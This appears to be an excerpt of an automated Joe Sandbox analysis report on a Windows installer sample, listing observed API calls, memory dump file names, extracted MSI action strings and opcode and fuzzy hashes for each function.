                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,00000000,?,00000000,00DB225D,000000FF,?,80004005,?,?), ref: 00CB6288
• MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,80004005,?,?,?,00000000,00DE48ED,000000FF,?,00CB4B55), ref: 00CB62BA
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID:
• API String ID: 626452242-0
• Opcode ID: bb63c42784554585990b2d22bc52feb989ffc0d5879f7c41020d5ff4c201ddbf
• Instruction ID: 2ffe21822f54ae771a7ad4cc45b84ff0e6f5f6c43819e45007bb34f9d7409e43
• Opcode Fuzzy Hash: bb63c42784554585990b2d22bc52feb989ffc0d5879f7c41020d5ff4c201ddbf
• Instruction Fuzzy Hash: 75014931301121AFE6149B59DC89FAEF759EFD4321F20412DF310EB2D0CB616D118795
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b0ef8cda21a31e0da486c69ee36a29effcdb2eaf8e357b282a235c22b1f274a
• Instruction ID: 06b8cecbf01ba430d3a752fbfb53f448c9f5e04190fa9b08d538093a868e3e4b
• Opcode Fuzzy Hash: 1b0ef8cda21a31e0da486c69ee36a29effcdb2eaf8e357b282a235c22b1f274a
• Instruction Fuzzy Hash: 0551B375600615AFC710DF69E894AAAB7B4FF05320F058269EE25DB261DB30ED45CBB0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(E8458D00,?,00D9FDED,00D9FDE1,00000000), ref: 00D9FBD0
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-0
• Opcode ID: 914008185fc2599e7ba1e3e4ac8dcfb9921e0ea6dc1961ba3e0263cd0b0637cb
• Instruction ID: 9dea6c4806e1bece1442e5b94a46124de2d1941ba357622a7c9dd82d8aeb7c55
• Opcode Fuzzy Hash: 914008185fc2599e7ba1e3e4ac8dcfb9921e0ea6dc1961ba3e0263cd0b0637cb
• Instruction Fuzzy Hash: 9D51477190425C9ADF218B28DD80AEA7BBCEB55304F2845FDE59AD7182C335AD46DB30
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,80004005,1FC3D414,?,?,00000000,?,?,00DA842D,000000FF,?), ref: 00D11962
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: ObjectSingleWait
• String ID:
• API String ID: 24740636-0
• Opcode ID: 3fe38a62257f6f1b7a921e662803fc558ff3244299bb8b2d02b2cdb4f3fcdc7a
• Instruction ID: 174f9fd5ccdec01ab86442a3cd3f2a051c9df4b5a3b1ad31d515d9ca3b2823bd
• Opcode Fuzzy Hash: 3fe38a62257f6f1b7a921e662803fc558ff3244299bb8b2d02b2cdb4f3fcdc7a
• Instruction Fuzzy Hash: 6521F3352006257FC6219F99E490A96F7A4FF15300B064125EF75AB612DF60EC91CBF0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00CD1DA0: __Init_thread_footer.LIBCMT ref: 00CD1E16
  • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
  • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
• __Init_thread_footer.LIBCMT ref: 00CD1C10
  • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
  • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
  • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionVariableWake
• String ID:
• API String ID: 984842325-0
• Opcode ID: 1a858d59d8e6e2ed45b0f17a35dedeff0c73aba9521561a20863569ee13af1b8
• Instruction ID: 7effb616bd9521960077425888dcabb11819b896a3228af3a0e2567583767566
• Opcode Fuzzy Hash: 1a858d59d8e6e2ed45b0f17a35dedeff0c73aba9521561a20863569ee13af1b8
• Instruction Fuzzy Hash: 8C310471584784FFEB24DF15EC82B49B7A0F740710F24061BEE556B7D0EBB169088B56
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BC8CF0: EnterCriticalSection.KERNEL32(00E9E7BC), ref: 00BC8D2C
                                                                                                                                                                          • Part of subcall function 00BC8CF0: GetCurrentThreadId.KERNEL32 ref: 00BC8D40
                                                                                                                                                                          • Part of subcall function 00BC8CF0: LeaveCriticalSection.KERNEL32(00E9E7BC), ref: 00BC8D7F
                                                                                                                                                                        • SetWindowLongW.USER32(?,00000004,00000000), ref: 00C28D8D
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
• String ID:
• API String ID: 3550545212-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
  • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
• __Init_thread_footer.LIBCMT ref: 00CB21E2
  • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
  • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
  • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
Similarity
• API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
• String ID:
• API String ID: 2296764815-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000008,?,?,?,00D98004,00000001,00000364,?,00000002,000000FF,?,00D89D85,00000000,00D95FF3,00E8EBCC,?), ref: 00D997F0
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D80372: EnterCriticalSection.KERNEL32(00E97DCC,?,?,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?), ref: 00D8037D
  • Part of subcall function 00D80372: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBAC36,00E989FC,1FC3D414,?,?,00DA84ED,000000FF,?,00D11851,1FC3D414,?,?,00000000,?), ref: 00D803BA
• __Init_thread_footer.LIBCMT ref: 00CD1E16
  • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
  • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
  • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
Similarity
• API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
• String ID:
• API String ID: 2296764815-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,1FC3D414,00000000,?,?,00000000,00DF487E,000000FF,?,80004005), ref: 00D0CC58
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00000000,00D95FF3,?,00D9A198,?,00000000,?,00D89D85,00000000,00D95FF3,00E8EBCC,?,00E8EBC8,?,00D95DED), ref: 00D98279
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: ff76a25e5103c906cb449ea748c9cd92279501ce17c9a780191f0f262bbd27df
                                                                                                                                                                        • Instruction ID: b41a2ab1fb301814e4c85536dc78e5ee5e0e3beb2dd2c5aa49123790ea08c587
                                                                                                                                                                        • Opcode Fuzzy Hash: ff76a25e5103c906cb449ea748c9cd92279501ce17c9a780191f0f262bbd27df
                                                                                                                                                                        • Instruction Fuzzy Hash: 37E0ED31540E206AEF212766AD04B6E3658DB83BA0F2C4221EC45A30D0EF20DC00A6B8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 431132790-0
                                                                                                                                                                        • Opcode ID: b471d721e6628c85995a646bf172badbea23e17c9d047550f4f344b244667eb0
                                                                                                                                                                        • Instruction ID: 483f3a6750ad9f88131a51a23e6ec464879eec94083ff6d7a0e8c2921a62f149
                                                                                                                                                                        • Opcode Fuzzy Hash: b471d721e6628c85995a646bf172badbea23e17c9d047550f4f344b244667eb0
                                                                                                                                                                        • Instruction Fuzzy Hash: D7E075B6C0060E9EDB41EFD4C552AEFBBB8EB08300F504126E245E6141EA7497898FB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 100$10000$100000$12000$120000$1500$15000$1500000$1800$2000$20000$200000$3000$30000$3000000$500$5000$6000$8000$AI_AppSearchEx$AI_ChainProductsPseudo$AI_CountRowAction$AI_DefaultActionCost$AI_DownloadPrereq$AI_ExtractPrereq$AI_Game$AI_GxInstall$AI_GxUninstall$AI_InstallPostPrerequisite$AI_InstallPrerequisite$AI_PreRequisite$AI_ProcessAccounts$AI_ProcessGroups$AI_ProcessTasks$AI_ScheduledTasks$AI_UninstallAccounts$AI_UninstallGroups$AI_UninstallTasks$AI_UserAccounts$AI_UserGroups$AI_XmlAttribute$AI_XmlElement$AI_XmlInstall$AI_XmlUninstall$AppId$BindImage$Complus$Component_$CreateFolder$CreateFolders$CreateShortcuts$DuplicateFile$DuplicateFiles$Environment$Extension$Feature$Feature_$File$FileSize$Font$IniFile$InstallFiles$InstallFinalize$InstallInitialize$InstallODBC$InstallServices$Location$MIME$MoveFile$MoveFiles$MsiAssembly$MsiConfigureServices$MsiPublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$Options$Patch$PatchFiles$PatchSize$ProgId$PublishComponent$PublishComponents$PublishFeatures$RegisterClassInfo$RegisterComPlus$RegisterExtensionInfo$RegisterFonts$RegisterMIMEInfo$RegisterProgIdInfo$RegisterTypeLibraries$Registry$RemoveDuplicateFiles$RemoveEnvironmentStrings$RemoveFile$RemoveFiles$RemoveFolders$RemoveIniFile$RemoveIniValues$RemoveShortcuts$SelfReg$SelfRegModules$ServiceControl$ServiceInstall$Shortcut$StartServices$TypeLib$UnregisterClassInfo$UnregisterExtensionInfo$UnregisterMIMEInfo$UnregisterProgIdInfo$WriteEnvironmentStrings$WriteIniValues$WriteRegistryValues$~
                                                                                                                                                                        • API String ID: 0-2578128725
                                                                                                                                                                        • Opcode ID: 2d6254474b0698ff040946f211681bc712be4a73c77b06222b7fc2a8de499c2f
                                                                                                                                                                        • Instruction ID: bc8121a148369322779d3756cba7ccc6ebf9a50516835ac61861cfbbd0df3af2
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d6254474b0698ff040946f211681bc712be4a73c77b06222b7fc2a8de499c2f
                                                                                                                                                                        • Instruction Fuzzy Hash: 6423E760E45394AADB10EBB55D1B7AD3B915F93704F1867AAF2513B2E2CBF00684C3D2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 12000$15000$2000$3000$30000$800$8000$AppSearch$Complus$Component$Component_$CostFinalize$CostInitialize$Feature$Feature_$File$FileCost$Font$InstallValidate$MsiUnpublishAssemblies$ODBCDataSource$ODBCDriver$ODBCTranslator$ProcessComponents$PublishComponent$Registry$RemoveExistingProducts$RemoveODBC$RemoveRegistry$RemoveRegistryValues$SelfReg$SelfUnregModules$ServiceControl$StopServices$UnpublishComponents$UnpublishFeatures$UnregisterComPlus$UnregisterFonts$u
                                                                                                                                                                        • API String ID: 0-3127294129
                                                                                                                                                                        • Opcode ID: 5857606241971e7e43755d9620cb9a0ed37a07070815482f06678adba4a9f046
                                                                                                                                                                        • Instruction ID: 963761897d28bb304d0950e7fbe7fdcbe6753b8a8e711afe7f6bb6608fba5c9f
                                                                                                                                                                        • Opcode Fuzzy Hash: 5857606241971e7e43755d9620cb9a0ed37a07070815482f06678adba4a9f046
                                                                                                                                                                        • Instruction Fuzzy Hash: 75C29460E553849EF740DB6ADD4A7E67BA1AB96308F24524FE1043A2E3DBF512CCC781
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC38B
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC3BC
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC415
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC4C4
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC608
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00BDC619
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC663
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC68C
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BDC697
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC7A5
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00BDC7B2
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC7FA
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BDC822
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BDC82C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClearVariant$String$AllocFree
                                                                                                                                                                        • String ID: GetFontHeight$MessageBox$MsiEvaluateCondition$MsiGetBinaryPath$MsiGetBinaryPathIndirect$MsiGetBytesCountText$MsiGetFormattedError$MsiGetProperty$MsiPublishEvents$MsiResolveFormatted$MsiSetProperty
                                                                                                                                                                        • API String ID: 1305860026-3153392536
                                                                                                                                                                        • Opcode ID: 6fcdc5e825ef34c9154f67a0ef64daff8e4c0c5bcae93015088ab44104d219ab
                                                                                                                                                                        • Instruction ID: df564c9c1b92e43ba244f072ff20761486fdb312726e2638a63c715b538783fe
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fcdc5e825ef34c9154f67a0ef64daff8e4c0c5bcae93015088ab44104d219ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E928B71D102499BCB14CFA8CC85BEEBBB4FF48314F20825AE455B7391EB74AA85CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,msix,00000004,?,?,?,?,?, ?(-|/)+q,00E17BBE), ref: 00BEBAEE
                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,msixbundle,0000000A,msix,00000004,?,?,?,?,?, ?(-|/)+q,00E17BBE), ref: 00BEBC6E
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BEBE2B
                                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 00BEB827
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?, ?(-|/)+q,00E17BBE), ref: 00BEC183
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC1EF
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC1F6
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC1FD
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC213
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BEC3FE
                                                                                                                                                                        • std::_Throw_Cpp_error.LIBCPMT ref: 00BEC50F
• std::_Throw_Cpp_error.LIBCPMT ref: 00BEC516
• std::_Throw_Cpp_error.LIBCPMT ref: 00BEC51D
• std::_Throw_Cpp_error.LIBCPMT ref: 00BEC524
  • Part of subcall function 00BD11B0: FindClose.KERNEL32(00000000,00000000,?,?,?,00CDD167), ref: 00BD12EF
  • Part of subcall function 00BD11B0: PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 00BD13A7
  • Part of subcall function 00CCFDA0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,1FC3D414,?,00000000), ref: 00CCFDEB
  • Part of subcall function 00CCFDA0: GetLastError.KERNEL32(?,00000000), ref: 00CCFDF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$CurrentInit_thread_footerThreadlstrcmpi$CloseErrorFindFormatHeapInitLastMessagePathProcessSleepstd::locale::_
• String ID: ?(-|/)+q$($Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
• API String ID: 3689723087-3482523422
• Opcode ID: 2dac852a4f8019e27776d88b622d809c0598ea214c4a7e473355f55501dc25a1
• Instruction ID: 5712a6ee868aa9f6d44eb90615d6d7a52da546996839bbf8df2a10a06317230a
• Opcode Fuzzy Hash: 2dac852a4f8019e27776d88b622d809c0598ea214c4a7e473355f55501dc25a1
• Instruction Fuzzy Hash: 6A92AF31D00258DFDB24DFA9CC45BEEBBB1EF45314F248299E415B7292EB706A85CB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindClose.KERNEL32(00000000,00000000,?,?,?,00CDD167), ref: 00BD12EF
• PathIsUNCW.SHLWAPI(?,*.*,00000000), ref: 00BD13A7
• FindFirstFileW.KERNEL32(00000000,00000000,*.*,00000000), ref: 00BD14FC
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD1516
• GetFullPathNameW.KERNEL32(00000000,00000000,?,00000000), ref: 00BD1549
• FindClose.KERNEL32(00000000), ref: 00BD15B8
• SetLastError.KERNEL32(0000007B), ref: 00BD15C6
• _wcsrchr.LIBVCRUNTIME ref: 00BD161C
• _wcsrchr.LIBVCRUNTIME ref: 00BD163C
• PathIsUNCW.SHLWAPI(*.*,?,1FC3D414), ref: 00BD17D5
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
